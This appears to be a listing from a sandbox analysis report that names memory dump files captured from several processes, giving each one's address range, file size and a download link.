memory/904-33-0x000000001B1D0000-0x000000001B1DE000-memory.dmp

Filesize
56KB

Download
memory/904-32-0x000000001B1C0000-0x000000001B1C8000-memory.dmp

Filesize
32KB

Download
memory/904-31-0x000000001B1B0000-0x000000001B1BE000-memory.dmp

Filesize
56KB

Download
memory/904-34-0x000000001B9F0000-0x000000001B9F8000-memory.dmp

Filesize
32KB

Download
memory/904-36-0x000000001BA10000-0x000000001BA1C000-memory.dmp

Filesize
48KB

Download
memory/904-30-0x000000001B1A0000-0x000000001B1AA000-memory.dmp

Filesize
40KB

Download
memory/904-35-0x000000001BA00000-0x000000001BA08000-memory.dmp

Filesize
32KB

Download
memory/904-26-0x000000001B170000-0x000000001B17C000-memory.dmp

Filesize
48KB

Download
memory/904-12-0x00007FFB8FEB3000-0x00007FFB8FEB5000-memory.dmp

Filesize
8KB

Download
memory/904-27-0x000000001B180000-0x000000001B18C000-memory.dmp

Filesize
48KB

Download
memory/904-24-0x000000001B140000-0x000000001B152000-memory.dmp

Filesize
72KB

Download
memory/904-23-0x000000001B130000-0x000000001B138000-memory.dmp

Filesize
32KB

Download
memory/904-22-0x000000001B120000-0x000000001B12C000-memory.dmp

Filesize
48KB

Download
memory/904-21-0x000000001B110000-0x000000001B118000-memory.dmp

Filesize
32KB

Download
memory/904-19-0x000000001AF50000-0x000000001AFA6000-memory.dmp

Filesize
344KB

Download
memory/904-18-0x0000000000C80000-0x0000000000C8A000-memory.dmp

Filesize
40KB

Download
memory/904-17-0x0000000000B40000-0x0000000000B50000-memory.dmp

Filesize
64KB

Download
memory/904-16-0x0000000000C60000-0x0000000000C76000-memory.dmp

Filesize
88KB

Download
memory/904-14-0x0000000000B20000-0x0000000000B3C000-memory.dmp

Filesize
112KB

Download
memory/904-13-0x0000000000010000-0x00000000002F2000-memory.dmp

Filesize
2.9MB

Download
memory/904-15-0x000000001AFA0000-0x000000001AFF0000-memory.dmp

Filesize
320KB

Download
memory/1568-87-0x0000012BCF650000-0x0000012BCF672000-memory.dmp

Filesize
136KB

Download
memory/5220-214-0x0000000002AB0000-0x0000000002B06000-memory.dmp

Filesize
344KB

Download
memory/5220-224-0x000000001DCF0000-0x000000001DEB2000-memory.dmp

Filesize
1.8MB

Download